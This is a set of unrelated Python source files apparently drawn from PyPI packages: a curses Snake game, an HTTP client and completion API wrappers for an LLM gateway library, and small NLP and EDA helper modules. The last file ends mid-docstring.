# 3rd condition checks if snake has "eaten" (intersected with) itself, i.e. whether any cells re-appear in the list
while key != 27 and key != ord("q") and not snake.intersected_itself():
# Set the maximum amount of time to block for a key press
# This is effectively the update interval
self.stdscr.timeout(max(20, 250 // (snake.length // 5 + 1)))
key = self.stdscr.getch() # TODO: Do this last to prevent waiting before drawing game screen
# Update
(game_over, pellet) = self.update(key, snake, pellet, settings)
if game_over:
break
# Draw
self.draw(snake, pellet)
# For user input, remove the timeout but keep blocking enabled
self.stdscr.nodelay(False)
# Return score
return snake.length
def update(self, key, snake, pellet, settings):
# Set new direction based on the key input
# If an arrow key wasn't pressed then continue in same direction
if key == curses.KEY_LEFT:
new_direction = gu.LEFT
elif key == curses.KEY_RIGHT:
new_direction = gu.RIGHT
elif key == curses.KEY_UP:
new_direction = gu.UP
elif key == curses.KEY_DOWN:
new_direction = gu.DOWN
else:
new_direction = snake.direction
# Prevent the snake reversing on itself, i.e. check that the snake's current and new directions aren't the reverse
# of one another
if not np.array_equal(snake.direction, -new_direction):
snake.direction = new_direction
# Add a cell to the front of the snake, in the given direction
current_front = snake.cells[0]
new_front = current_front + snake.direction
if not settings["snake_wrapping"].value\
and not (np.all(new_front >= gu.ZERO) and np.all(new_front < self.size)):
return True, pellet
new_front = new_front % self.size
snake.cells = np.insert(snake.cells, 0, new_front, axis=0)
# If the snake just "ate" (intersected with) a pellet:
# * Effectively increase the length by 1, by not removing a cell to compensate for the one just added
# * Move the pellet to a random position
# If the snake didn't just "eat" a pellet:
# * Remove a cell to compensate for the one just added, so length of the snake stays the same
# * Obviously leave the pellet where it is
if (snake.cells == pellet).all(axis=1).any():
pellet = np.random.randint(self.size, size=2)
else:
snake.cells = np.delete(snake.cells, -1, axis=0)
return False, pellet
def draw_borders(self, base_position):
# Draw lines
self.stdscr.vline(base_position[0], base_position[1] - 1, curses.ACS_VLINE, self.size[0])
self.stdscr.vline(base_position[0], base_position[1] + self.size[1], curses.ACS_VLINE, self.size[0])
self.stdscr.hline(base_position[0] - 1, base_position[1], curses.ACS_HLINE, self.size[1])
self.stdscr.hline(base_position[0] + self.size[0], base_position[1], curses.ACS_HLINE, self.size[1])
# Draw corners
self.stdscr.addch(base_position[0] - 1, base_position[1] - 1, curses.ACS_ULCORNER)
self.stdscr.addch(base_position[0] - 1, base_position[1] + self.size[1], curses.ACS_URCORNER)
self.stdscr.addch(base_position[0] + self.size[0], base_position[1] - 1, curses.ACS_LLCORNER)
try:
self.stdscr.addch(base_position[0] + self.size[0], base_position[1] + self.size[1], curses.ACS_LRCORNER)
except curses.error as e: # Ignore error when writing to bottom-right corner of window
pass
def draw(self, snake, pellet):
self.stdscr.clear()
# Display score
self.stdscr.addstr(0, 0, f"Score: {snake.length}")
# Display hint
if snake.length <= 3:
self.stdscr.attron(curses.A_STANDOUT)
message = "Hint: To move faster, repeatedly press or hold the arrow key."
self.stdscr.addstr(0, gu.window_max(self.stdscr)[1] - len(message) + 1, message)
self.stdscr.attroff(curses.A_STANDOUT)
base_position = gu.align(self.stdscr, self.size, gu.HorizontalAlignment.CENTER, gu.VerticalAlignment.TOP) + [2, 0]
# Draw borders
self.draw_borders(base_position)
# Draw pellet
if curses.has_colors():
self.stdscr.attron(curses.color_pair(2))
try:
self.stdscr.addch(base_position[0] + pellet[0], base_position[1] + pellet[1], "o")
except curses.error as e: # Ignore error when writing to bottom-right corner of window
pass
if curses.has_colors():
self.stdscr.attroff(curses.color_pair(2))
# Draw snake
for cell in snake.cells:
if curses.has_colors():
self.stdscr.attron(curses.color_pair(1))
try:
self.stdscr.addch(base_position[0] + cell[0], base_position[1] + cell[1], "x")
except curses.error as e: # Ignore error when writing to bottom-right corner of window
pass
if curses.has_colors():
self.stdscr.attroff(curses.color_pair(1))
class Setting:
def __init__(self, name, key, value):
self.name = name
self.key = key
self.value = value
def curses_main(stdscr):
# Initialise colours
curses.init_pair(1, curses.COLOR_CYAN, curses.COLOR_BLACK)
curses.init_pair(2, curses.COLOR_YELLOW, curses.COLOR_BLACK)
# Show cursor
curses.curs_set(1)
settings = {
"snake_wrapping": Setting(name="Snake wraps around screen edge", key="b", value=True),
}
show_title_screen(stdscr, settings)
# Hide cursor
curses.curs_set(0)
game = Game(stdscr)
score = game.show(settings)
# Show cursor
curses.curs_set(1)
show_game_over_screen(stdscr, score)
# TODO: Add animation
def show_title_screen(stdscr, settings):
finished = False
while not finished:
stdscr.clear()
gu.addstr_multiline_aligned(stdscr, [
" ____ _ \n"
"/ ___| _ __ __ _| | _____ \n"
"\\___ \\| '_ \\ / _` | |/ / _ \\\n"
" ___) | | | | (_| | < __/\n"
"|____/|_| |_|\\__,_|_|\\_\\___|",
"",
"Ruben Dougall",
"",
"Press C to view controls...",
"Press S to change settings...",
"Press any key to start..."
], gu.HorizontalAlignment.CENTER, gu.VerticalAlignment.CENTER)
key = stdscr.getch()
if key == ord("c"):
show_controls_screen(stdscr)
elif key == ord("s"):
show_settings_screen(stdscr, settings)
else:
finished = True
def show_controls_screen(stdscr):
stdscr.clear()
gu.addstr_multiline_aligned(stdscr, [
"In-Game Controls",
"",
"← ↑ → ↓ - Change direction (hold to move faster)",
"Q - End game",
"",
"Press any key to close this screen..."
], gu.HorizontalAlignment.CENTER, gu.VerticalAlignment.CENTER)
stdscr.getch()
def show_settings_screen(stdscr, settings):
finished = False
while not finished:
stdscr.clear()
gu.addstr_multiline_aligned(stdscr, [
"Settings",
""
] + [f"{setting.key.upper()} - {setting.name} ({setting.value})" for setting in settings.values()] + [
"",
"Press any key to close this screen..."
], gu.HorizontalAlignment.CENTER, gu.VerticalAlignment.CENTER)
key = stdscr.getch()
setting = next((setting for setting in settings.values() if key == ord(setting.key)), None)
if setting is None:
finished = True
else:
setting.value = not setting.value
def show_game_over_screen(stdscr, score):
stdscr.clear()
gu.addstr_multiline_aligned(stdscr, [
"Game over!",
f"Score: {score}",
"",
"Press any key to exit..."
], gu.HorizontalAlignment.CENTER, gu.VerticalAlignment.CENTER)
stdscr.getch()
def main():
curses.wrapper(curses_main)
if __name__ == "__main__":
main() | /ruben_snake_cmd-0.3.0-py3-none-any.whl/snake_cmd.py | 0.638723 | 0.328718 | snake_cmd.py | pypi |
from __future__ import annotations
import json
from types import TracebackType
from typing import (
Dict,
Any,
Union,
Mapping,
cast,
List,
Optional,
Type,
overload,
Literal,
)
import httpx
import platform
from .global_constants import DEFAULT_MAX_RETRIES, PORTKEY_HEADER_PREFIX
from .utils import (
remove_empty_values,
Body,
Options,
Config,
ProviderOptions,
RubeusResponse,
)
from .exceptions import (
APIStatusError,
APITimeoutError,
APIConnectionError,
)
from rubeus.version import VERSION
from .utils import ResponseT, make_status_error
from .common_types import StreamT
from .streaming import Stream
class MissingStreamClassError(TypeError):
def __init__(self) -> None:
super().__init__(
"The `stream` argument was set to `True` but the `stream_cls` argument was\
not given",
)
class APIClient:
_client: httpx.Client
_default_stream_cls: Union[type[Stream[Any]], None] = None
def __init__(
self,
*,
base_url: str,
api_key: str,
timeout: Union[float, None],
max_retries: int = DEFAULT_MAX_RETRIES,
custom_headers: Optional[Mapping[str, Any]] = None,
custom_query: Optional[Mapping[str, object]],
custom_params: Optional[Dict[str, Any]] = None,
) -> None:
self.api_key = api_key
self.max_retries = max_retries
self._custom_headers = self._serialize_header_values(custom_headers)
self._custom_query = custom_query
self._custom_params = custom_params
self._client = httpx.Client(
base_url=base_url,
timeout=timeout,
headers={"Accept": "application/json"},
)
def _serialize_header_values(
self, headers: Optional[Mapping[str, Any]]
) -> Dict[str, str]:
if headers is None:
return {}
return {
f"{PORTKEY_HEADER_PREFIX}{k}": json.dumps(v)
if isinstance(v, (dict, list))
else str(v)
for k, v in headers.items()
}
@property
def custom_auth(self) -> Optional[httpx.Auth]:
return None
@overload
def post(
self,
path: str,
*,
body: List[Body],
mode: str,
cast_to: Type[ResponseT],
stream: Literal[True],
stream_cls: type[StreamT],
) -> StreamT:
...
@overload
def post(
self,
path: str,
*,
body: List[Body],
mode: str,
cast_to: Type[ResponseT],
stream: Literal[False],
stream_cls: type[StreamT],
) -> ResponseT:
...
@overload
def post(
self,
path: str,
*,
body: List[Body],
mode: str,
cast_to: Type[ResponseT],
stream: bool,
stream_cls: type[StreamT],
) -> Union[ResponseT, StreamT]:
...
def post(
self,
path: str,
*,
body: List[Body],
mode: str,
cast_to: Type[ResponseT],
stream: bool,
stream_cls: type[StreamT],
) -> Union[ResponseT, StreamT]:
body = cast(List[Body], body)
opts = self._construct(method="post", url=path, body=body, mode=mode)
res = self._request(
options=opts,
stream=stream,
cast_to=cast_to,
stream_cls=stream_cls,
)
return res
def _construct(
self, *, method: str, url: str, body: List[Body], mode: str
) -> Options:
opts = Options.construct()
opts.method = method
opts.url = url
json_body = {
"config": self._config(mode, body).dict(),
"params": self._custom_params,
}
opts.json_body = remove_empty_values(json_body)
opts.headers = (
remove_empty_values(self._custom_headers) if self._custom_headers else None
)
return opts
def _config(self, mode: str, body: List[Body]) -> Config:
config = Config(mode=mode, options=[])
for i in body:
item = i.dict()
override_params = i.override_params()
options = ProviderOptions(
provider=item.get("provider"),
apiKey=item.get("api_key"),
weight=item.get("weight"),
retry=item.get("retry"),
override_params=override_params,
)
config.options.append(options)
return config
@property
def _default_headers(self) -> Mapping[str, str]:
return {
"Content-Type": "application/json",
f"{PORTKEY_HEADER_PREFIX}api-key": self.api_key,
f"{PORTKEY_HEADER_PREFIX}package-version": f"rubeus-{VERSION}",
f"{PORTKEY_HEADER_PREFIX}runtime": platform.python_implementation(),
f"{PORTKEY_HEADER_PREFIX}runtime-version": platform.python_version(),
}
def _build_headers(self, options: Options) -> httpx.Headers:
custom_headers = options.headers or {}
headers_dict = self._merge_mappings(self._default_headers, custom_headers)
headers = httpx.Headers(headers_dict)
return headers
def _merge_mappings(
self,
obj1: Mapping[str, Any],
obj2: Mapping[str, Any],
) -> Dict[str, Any]:
"""Merge two mappings of the given type
In cases with duplicate keys the second mapping takes precedence.
"""
return {**obj1, **obj2}
def is_closed(self) -> bool:
return self._client.is_closed
def close(self) -> None:
"""Close the underlying HTTPX client.
The client will *not* be usable after this.
"""
self._client.close()
def __enter__(self: Any) -> Any:
return self
def __exit__(
self,
exc_type: Optional[BaseException],
exc: Optional[BaseException],
exc_tb: Optional[TracebackType],
) -> None:
self.close()
def _build_request(self, options: Options) -> httpx.Request:
headers = self._build_headers(options)
params = options.params
json_body = options.json_body
request = self._client.build_request(
method=options.method,
url=options.url,
headers=headers,
params=params,
json=json_body,
timeout=options.timeout,
)
return request
@overload
def _request(
self,
*,
options: Options,
stream: Literal[False],
cast_to: Type[ResponseT],
stream_cls: Union[type[StreamT], None] = None,
) -> ResponseT:
...
@overload
def _request(
self,
*,
options: Options,
stream: Literal[True],
cast_to: Type[ResponseT],
stream_cls: Union[type[StreamT], None] = None,
) -> StreamT:
...
@overload
def _request(
self,
*,
options: Options,
stream: bool,
cast_to: Type[ResponseT],
stream_cls: Union[type[StreamT], None] = None,
) -> Union[ResponseT, StreamT]:
...
def _request(
self,
*,
options: Options,
stream: bool,
cast_to: Type[ResponseT],
stream_cls: Union[type[StreamT], None] = None,
) -> Union[ResponseT, StreamT]:
request = self._build_request(options)
try:
res = self._client.send(request, auth=self.custom_auth, stream=stream)
res.raise_for_status()
except httpx.HTTPStatusError as err: # 4xx and 5xx errors
# If the response is streamed then we need to explicitly read the response
# to completion before attempting to access the response text.
err.response.read()
raise self._make_status_error_from_response(request, err.response) from None
except httpx.TimeoutException as err:
raise APITimeoutError(request=request) from err
except Exception as err:
raise APIConnectionError(request=request) from err
if stream:
stream_cls = stream_cls or cast(
"Union[type[StreamT], None]", self._default_stream_cls
)
if stream_cls is None:
raise MissingStreamClassError()
stream_response = stream_cls(response=res)
return stream_response
response = cast(
ResponseT,
RubeusResponse.construct(**res.json(), raw_body=res.json()),
)
return response
def _make_status_error_from_response(
self,
request: httpx.Request,
response: httpx.Response,
) -> APIStatusError:
err_text = response.text.strip()
body = err_text
try:
body = json.loads(err_text)["error"]["message"]
err_msg = f"Error code: {response.status_code} - {body}"
except Exception:
err_msg = err_text or f"Error code: {response.status_code}"
return make_status_error(err_msg, body=body, request=request, response=response) | /api_resources/base_client.py | 0.870941 | 0.153137 | base_client.py | pypi |
from typing import Optional, Union, List, Dict, Any, cast, overload, Literal
from rubeus.api_resources.base_client import APIClient
from .global_constants import DEFAULT_MAX_RETRIES, DEFAULT_TIMEOUT
from .utils import (
ProviderTypes,
RubeusCacheType,
LLMBase,
RubeusModes,
Message,
ProviderTypesLiteral,
Body,
RubeusResponse,
RetrySettings,
Function,
)
from .streaming import Stream
__all__ = ["Completions", "ChatCompletions"]
class APIResource:
_client: APIClient
def __init__(self, client: APIClient) -> None:
self._client = client
# self._get = client.get
self._post = client.post
# self._patch = client.patch
# self._put = client.put
# self._delete = client.delete
# self._get_api_list = client.get_api_list
class Completions(APIResource):
@overload
def create(
self,
*,
prompt: str = "",
timeout: Union[float, None] = DEFAULT_TIMEOUT,
max_retries: int = DEFAULT_MAX_RETRIES,
provider: Union[ProviderTypes, ProviderTypesLiteral] = ProviderTypes.OPENAI,
model: str = "gpt-3.5-turbo",
api_key: str = "",
temperature: float = 0.1,
top_k: Optional[int] = None,
top_p: Optional[float] = None,
stop_sequences: Optional[List[str]] = None,
max_tokens: Optional[int] = None,
trace_id: Optional[str] = None,
cache_status: Optional[RubeusCacheType] = None,
cache: Optional[bool] = False,
metadata: Optional[Dict[str, Any]] = None,
weight: Optional[float] = 1.0,
stream: Literal[True],
retry_settings: Optional[RetrySettings] = None,
functions: Optional[List[Function]] = None,
function_call: Optional[Union[None, str, Function]] = None,
n: Optional[int] = None,
logprobs: Optional[int] = None,
echo: Optional[bool] = None,
stop: Optional[Union[str, List[str]]] = None,
presence_penalty: Optional[int] = None,
frequency_penalty: Optional[int] = None,
best_of: Optional[int] = None,
logit_bias: Optional[Dict[str, int]] = None,
user: Optional[str] = None,
) -> Stream[RubeusResponse]:
...
@overload
def create(
self,
*,
prompt: str = "",
timeout: Union[float, None] = DEFAULT_TIMEOUT,
max_retries: int = DEFAULT_MAX_RETRIES,
provider: Union[ProviderTypes, ProviderTypesLiteral] = ProviderTypes.OPENAI,
model: str = "gpt-3.5-turbo",
api_key: str = "",
temperature: float = 0.1,
top_k: Optional[int] = None,
top_p: Optional[float] = None,
stop_sequences: Optional[List[str]] = None,
max_tokens: Optional[int] = None,
trace_id: Optional[str] = None,
cache_status: Optional[RubeusCacheType] = None,
cache: Optional[bool] = False,
metadata: Optional[Dict[str, Any]] = None,
weight: Optional[float] = 1.0,
stream: Literal[False] = False,
retry_settings: Optional[RetrySettings] = None,
functions: Optional[List[Function]] = None,
function_call: Optional[Union[None, str, Function]] = None,
n: Optional[int] = None,
logprobs: Optional[int] = None,
echo: Optional[bool] = None,
stop: Optional[Union[str, List[str]]] = None,
presence_penalty: Optional[int] = None,
frequency_penalty: Optional[int] = None,
best_of: Optional[int] = None,
logit_bias: Optional[Dict[str, int]] = None,
user: Optional[str] = None,
) -> RubeusResponse:
...
@overload
def create(
self,
*,
prompt: str = "",
timeout: Union[float, None] = DEFAULT_TIMEOUT,
max_retries: int = DEFAULT_MAX_RETRIES,
provider: Union[ProviderTypes, ProviderTypesLiteral] = ProviderTypes.OPENAI,
model: str = "gpt-3.5-turbo",
api_key: str = "",
temperature: float = 0.1,
top_k: Optional[int] = None,
top_p: Optional[float] = None,
stop_sequences: Optional[List[str]] = None,
max_tokens: Optional[int] = None,
trace_id: Optional[str] = None,
cache_status: Optional[RubeusCacheType] = None,
cache: Optional[bool] = False,
metadata: Optional[Dict[str, Any]] = None,
weight: Optional[float] = 1.0,
stream: bool = False,
retry_settings: Optional[RetrySettings] = None,
functions: Optional[List[Function]] = None,
function_call: Optional[Union[None, str, Function]] = None,
n: Optional[int] = None,
logprobs: Optional[int] = None,
echo: Optional[bool] = None,
stop: Optional[Union[str, List[str]]] = None,
presence_penalty: Optional[int] = None,
frequency_penalty: Optional[int] = None,
best_of: Optional[int] = None,
logit_bias: Optional[Dict[str, int]] = None,
user: Optional[str] = None,
) -> Union[RubeusResponse, Stream[RubeusResponse]]:
...
def create(
self,
*,
prompt: str = "",
timeout: Union[float, None] = DEFAULT_TIMEOUT,
max_retries: int = DEFAULT_MAX_RETRIES,
provider: Union[ProviderTypes, ProviderTypesLiteral] = ProviderTypes.OPENAI,
model: str = "gpt-3.5-turbo",
api_key: str = "",
temperature: float = 0.1,
top_k: Optional[int] = None,
top_p: Optional[float] = None,
stop_sequences: Optional[List[str]] = None,
max_tokens: Optional[int] = None,
trace_id: Optional[str] = None,
cache_status: Optional[RubeusCacheType] = None,
cache: Optional[bool] = False,
metadata: Optional[Dict[str, Any]] = None,
weight: Optional[float] = 1.0,
stream: bool = False,
retry_settings: Optional[RetrySettings] = None,
functions: Optional[List[Function]] = None,
function_call: Optional[Union[None, str, Function]] = None,
n: Optional[int] = None,
logprobs: Optional[int] = None,
echo: Optional[bool] = None,
stop: Optional[Union[str, List[str]]] = None,
presence_penalty: Optional[int] = None,
frequency_penalty: Optional[int] = None,
best_of: Optional[int] = None,
logit_bias: Optional[Dict[str, int]] = None,
user: Optional[str] = None,
) -> Union[RubeusResponse, Stream[RubeusResponse]]:
llm = Body(
prompt=prompt,
timeout=timeout,
max_retries=max_retries,
provider=provider,
model=model,
api_key=api_key,
temperature=temperature,
top_k=top_k,
top_p=top_p,
stop_sequences=stop_sequences,
max_tokens=max_tokens,
trace_id=trace_id,
cache_status=cache_status,
cache=cache,
metadata=metadata,
weight=weight,
retry_settings=retry_settings,
functions=functions,
function_call=function_call,
n=n,
logprobs=logprobs,
echo=echo,
stop=stop,
presence_penalty=presence_penalty,
frequency_penalty=frequency_penalty,
best_of=best_of,
logit_bias=logit_bias,
user=user,
)
return self._post(
"/v1/complete",
body=[llm],
mode=RubeusModes.SINGLE.value,
cast_to=RubeusResponse,
stream_cls=Stream[RubeusResponse],
stream=stream,
)
@overload
def with_fallbacks(
self, *, llms: List[LLMBase], stream: Literal[True]
) -> Stream[RubeusResponse]:
...
@overload
def with_fallbacks(
self, *, llms: List[LLMBase], stream: Literal[False] = False
) -> RubeusResponse:
...
@overload
def with_fallbacks(
self, *, llms: List[LLMBase], stream: bool = False
) -> Union[RubeusResponse, Stream[RubeusResponse]]:
...
def with_fallbacks(
self, llms: List[LLMBase], stream: bool = False
) -> Union[RubeusResponse, Stream[RubeusResponse]]:
body = []
for i in llms:
body.append(cast(Body, i))
return self._post(
"/v1/complete",
body=body,
mode=RubeusModes.FALLBACK,
cast_to=RubeusResponse,
stream_cls=Stream[RubeusResponse],
stream=stream,
)
@overload
def with_loadbalancing(
self, llms: List[LLMBase], stream: Literal[True]
) -> Stream[RubeusResponse]:
...
@overload
def with_loadbalancing(
self, llms: List[LLMBase], stream: Literal[False] = False
) -> RubeusResponse:
...
@overload
def with_loadbalancing(
self, llms: List[LLMBase], stream: bool = False
) -> Union[RubeusResponse, Stream[RubeusResponse]]:
...
def with_loadbalancing(
self, llms: List[LLMBase], stream: bool = False
) -> Union[RubeusResponse, Stream[RubeusResponse]]:
body = []
for i in llms:
body.append(cast(Body, i))
return self._post(
"/v1/complete",
body=body,
mode=RubeusModes.LOADBALANCE,
cast_to=RubeusResponse,
stream_cls=Stream[RubeusResponse],
stream=stream,
)
@overload
def single(
self, llms: List[LLMBase], stream: Literal[True]
) -> Stream[RubeusResponse]:
...
@overload
def single(
self, llms: List[LLMBase], stream: Literal[False] = False
) -> RubeusResponse:
...
@overload
def single(
self, llms: List[LLMBase], stream: bool = False
) -> Union[RubeusResponse, Stream[RubeusResponse]]:
...
def single(
self, llms: List[LLMBase], stream: bool = False
) -> Union[RubeusResponse, Stream[RubeusResponse]]:
body = []
for i in llms:
body.append(cast(Body, i))
return self._post(
"/v1/complete",
body=body,
mode=RubeusModes.SINGLE,
cast_to=RubeusResponse,
stream_cls=Stream[RubeusResponse],
stream=stream,
)
class ChatCompletions(APIResource):
@overload
def create(
self,
*,
messages: List[Message],
provider: ProviderTypes = ProviderTypes.OPENAI,
model: str = "gpt-3.5-turbo",
api_key: str = "",
timeout: Union[float, None] = DEFAULT_TIMEOUT,
max_retries: int = DEFAULT_MAX_RETRIES,
temperature: float = 0.1,
top_k: Optional[int] = None,
top_p: Optional[float] = None,
stop_sequences: Optional[List[str]] = None,
max_tokens: Optional[int] = None,
trace_id: Optional[str] = "",
cache_status: Optional[RubeusCacheType] = None,
cache: Optional[bool] = False,
metadata: Optional[Dict[str, Any]] = None,
weight: Optional[float] = 1.0,
stream: Literal[True],
retry_settings: Optional[RetrySettings] = None,
functions: Optional[List[Function]] = None,
function_call: Optional[Union[None, str, Function]] = None,
n: Optional[int] = None,
logprobs: Optional[int] = None,
echo: Optional[bool] = None,
stop: Optional[Union[str, List[str]]] = None,
presence_penalty: Optional[int] = None,
frequency_penalty: Optional[int] = None,
best_of: Optional[int] = None,
logit_bias: Optional[Dict[str, int]] = None,
user: Optional[str] = None,
) -> Stream[RubeusResponse]:
...
@overload
def create(
self,
*,
messages: List[Message],
provider: ProviderTypes = ProviderTypes.OPENAI,
model: str = "gpt-3.5-turbo",
api_key: str = "",
timeout: Union[float, None] = DEFAULT_TIMEOUT,
max_retries: int = DEFAULT_MAX_RETRIES,
temperature: float = 0.1,
top_k: Optional[int] = None,
top_p: Optional[float] = None,
stop_sequences: Optional[List[str]] = None,
max_tokens: Optional[int] = None,
trace_id: Optional[str] = "",
cache_status: Optional[RubeusCacheType] = None,
cache: Optional[bool] = False,
metadata: Optional[Dict[str, Any]] = None,
weight: Optional[float] = 1.0,
stream: Literal[False] = False,
retry_settings: Optional[RetrySettings] = None,
functions: Optional[List[Function]] = None,
function_call: Optional[Union[None, str, Function]] = None,
n: Optional[int] = None,
logprobs: Optional[int] = None,
echo: Optional[bool] = None,
stop: Optional[Union[str, List[str]]] = None,
presence_penalty: Optional[int] = None,
frequency_penalty: Optional[int] = None,
best_of: Optional[int] = None,
logit_bias: Optional[Dict[str, int]] = None,
user: Optional[str] = None,
) -> RubeusResponse:
...
@overload
def create(
self,
*,
messages: List[Message],
provider: ProviderTypes = ProviderTypes.OPENAI,
model: str = "gpt-3.5-turbo",
api_key: str = "",
timeout: Union[float, None] = DEFAULT_TIMEOUT,
max_retries: int = DEFAULT_MAX_RETRIES,
temperature: float = 0.1,
top_k: Optional[int] = None,
top_p: Optional[float] = None,
stop_sequences: Optional[List[str]] = None,
max_tokens: Optional[int] = None,
trace_id: Optional[str] = "",
cache_status: Optional[RubeusCacheType] = None,
cache: Optional[bool] = False,
metadata: Optional[Dict[str, Any]] = None,
weight: Optional[float] = 1.0,
stream: bool = False,
retry_settings: Optional[RetrySettings] = None,
functions: Optional[List[Function]] = None,
function_call: Optional[Union[None, str, Function]] = None,
n: Optional[int] = None,
logprobs: Optional[int] = None,
echo: Optional[bool] = None,
stop: Optional[Union[str, List[str]]] = None,
presence_penalty: Optional[int] = None,
frequency_penalty: Optional[int] = None,
best_of: Optional[int] = None,
logit_bias: Optional[Dict[str, int]] = None,
user: Optional[str] = None,
) -> Union[RubeusResponse, Stream[RubeusResponse]]:
...
def create(
self,
*,
messages: List[Message],
provider: ProviderTypes = ProviderTypes.OPENAI,
model: str = "gpt-3.5-turbo",
api_key: str = "",
timeout: Union[float, None] = DEFAULT_TIMEOUT,
max_retries: int = DEFAULT_MAX_RETRIES,
temperature: float = 0.1,
top_k: Optional[int] = None,
top_p: Optional[float] = None,
stop_sequences: Optional[List[str]] = None,
max_tokens: Optional[int] = None,
trace_id: Optional[str] = "",
cache_status: Optional[RubeusCacheType] = None,
cache: Optional[bool] = False,
metadata: Optional[Dict[str, Any]] = None,
weight: Optional[float] = 1.0,
stream: bool = False,
retry_settings: Optional[RetrySettings] = None,
functions: Optional[List[Function]] = None,
function_call: Optional[Union[None, str, Function]] = None,
n: Optional[int] = None,
logprobs: Optional[int] = None,
echo: Optional[bool] = None,
stop: Optional[Union[str, List[str]]] = None,
presence_penalty: Optional[int] = None,
frequency_penalty: Optional[int] = None,
best_of: Optional[int] = None,
logit_bias: Optional[Dict[str, int]] = None,
user: Optional[str] = None,
) -> Union[RubeusResponse, Stream[RubeusResponse]]:
llm = Body(
messages=messages,
timeout=timeout,
max_retries=max_retries,
provider=provider,
model=model,
api_key=api_key,
temperature=temperature,
top_k=top_k,
top_p=top_p,
stop_sequences=stop_sequences,
max_tokens=max_tokens,
trace_id=trace_id,
cache_status=cache_status,
cache=cache,
metadata=metadata,
weight=weight,
retry_settings=retry_settings,
functions=functions,
function_call=function_call,
n=n,
logprobs=logprobs,
echo=echo,
stop=stop,
presence_penalty=presence_penalty,
frequency_penalty=frequency_penalty,
best_of=best_of,
logit_bias=logit_bias,
user=user,
)
return self._post(
"/v1/chatComplete",
body=[llm],
mode=RubeusModes.SINGLE.value,
cast_to=RubeusResponse,
stream_cls=Stream[RubeusResponse],
stream=stream,
)
@overload
def with_fallbacks(
self, *, llms: List[LLMBase], stream: Literal[True]
) -> Stream[RubeusResponse]:
...
@overload
def with_fallbacks(
self, *, llms: List[LLMBase], stream: Literal[False] = False
) -> RubeusResponse:
...
@overload
def with_fallbacks(
self, *, llms: List[LLMBase], stream: bool = False
) -> Union[RubeusResponse, Stream[RubeusResponse]]:
...
def with_fallbacks(
self, *, llms: List[LLMBase], stream: bool = False
) -> Union[RubeusResponse, Stream[RubeusResponse]]:
body = []
for i in llms:
body.append(cast(Body, i))
return self._post(
"/v1/chatComplete",
body=body,
mode=RubeusModes.FALLBACK,
cast_to=RubeusResponse,
stream_cls=Stream[RubeusResponse],
stream=stream,
)
@overload
def with_loadbalancing(
self, llms: List[LLMBase], stream: Literal[True]
) -> Stream[RubeusResponse]:
...
@overload
def with_loadbalancing(
self, llms: List[LLMBase], stream: Literal[False] = False
) -> RubeusResponse:
...
@overload
def with_loadbalancing(
self, llms: List[LLMBase], stream: bool = False
) -> Union[RubeusResponse, Stream[RubeusResponse]]:
...
def with_loadbalancing(
self, llms: List[LLMBase], stream: bool = False
) -> Union[RubeusResponse, Stream[RubeusResponse]]:
body = []
for i in llms:
body.append(cast(Body, i))
return self._post(
"/v1/chatComplete",
body=body,
mode=RubeusModes.LOADBALANCE,
cast_to=RubeusResponse,
stream_cls=Stream[RubeusResponse],
stream=stream,
)
@overload
def single(
self, llms: List[LLMBase], stream: Literal[True]
) -> Stream[RubeusResponse]:
...
@overload
def single(
self, llms: List[LLMBase], stream: Literal[False] = False
) -> RubeusResponse:
...
@overload
def single(
self, llms: List[LLMBase], stream: bool = False
) -> Union[RubeusResponse, Stream[RubeusResponse]]:
...
def single(
self, llms: List[LLMBase], stream: bool = False
) -> Union[RubeusResponse, Stream[RubeusResponse]]:
body = []
for i in llms:
body.append(cast(Body, i))
return self._post(
"/v1/chatComplete",
body=body,
mode=RubeusModes.SINGLE,
cast_to=RubeusResponse,
stream_cls=Stream[RubeusResponse],
stream=stream,
) | /api_resources/apis.py | 0.873269 | 0.155976 | apis.py | pypi |
from itertools import chain
from collections import Counter
from typing import List, Dict, Set
import re
import nltk
def word_counter(corpus: List[str]) -> Dict[str, int]:
"""
Count all the times a word appear in a corpus
Arguments:
corpus: List[str]
The corpus with all sentences
Returns
---------
Dict[str, int]: The corpus's wordcount
"""
corpus = list(chain(*corpus))
count = Counter(corpus)
count = dict(sorted(count.items(), key=lambda dictionary: dictionary[1], reverse=True))
return count
def sentence_length(corpus: List[str]) -> List[int]:
"""
Compute the length of each sentence in the corpush
Arguments
----------
corpus: List[str]
A list of sentences
Returns
--------
List[int]: the length of each sentence
"""
sentences_length = []
for sentence in corpus:
sentences_length.append(len(sentence))
return sentences_length
# This function is used when FeatureEnginieringNLP is very compuntationally expensive
def clean_and_tokenize(string: str) -> str:
"""
Clean points, do lower and tokenize the whole corpus
Arguments
----------
string: str
A sentence of the corpus
Returns
--------
A string that is the sentence without points, lowered and tokenized
"""
string = re.sub("[.,:;]", "", string)
string = string.lower()
return nltk.tokenize.treebank.TreebankWordTokenizer().tokenize(string)
class RemoveStopWords:
"""
Class to add and stopwords
Arguments
----------
language: str
The language of the stopwords
Methods
--------
add_stopwords: A set of stopwords to add
fit: The string to clean the stopwords
"""
def __init__(self, language: str = "english") -> None:
self.stopwords = set(nltk.corpus.stopwords.words(language))
def fit(self, string: List[str]) -> List[str]:
"""
Clean the stopwords from a tokenized sentence
Arguments
-----------
string: str
The sentence to clean the stopwords
Returns:
The sentence cleaned
"""
return [word for word in string if word not in self.stopwords]
def add_stopwords(self, stopwords: Set[str]) -> None:
"""
Add a set of stopwords to clean
Arguments:
-----------
stopwords: set[str]
A set of words to add in order to be cleaned from the sentence
"""
self.stopwords = self.stopwords | set(stopwords) | /rubiales_nlp-0.1.0.tar.gz/rubiales_nlp-0.1.0/rubiales_nlp/base.py | 0.88367 | 0.385028 | base.py | pypi |
from utils import tqdm_manager
from typing import List, Callable
import spacy
class SentenceEDA:
"""
It's an EDA Manager that you can add functions to create pipelines. In order to do EDA clear and efficient.
Parameters
-----------
corpus: a list of strings to apply the functions
funcs_to_map: The functions to map to the corpus
Methods
--------
fit: Execute all the functions added
"""
def __init__(self, corpus: list, funcs_to_map: list) -> None:
self.corpus = corpus
self.funcs_to_map = funcs_to_map
self.result_per_func = []
def fit(self) -> List[List]:
"""
Compute all EDA functions added
Returns:
A list of list with the result of every function
"""
for func in self.funcs_to_map:
self.result_per_func.append(func(self.corpus))
return self.result_per_func
class FeatureEnginieringNLP:
"""
Create 3 new variables from NLP, The token, the lemma and the POS. (This functions use a lot of resouces and can be
computationally expensive)
Parameters
-----------
model: str
The NLP pretrained model to use
functions: list[str] = ["token", "lemma", "pos"]
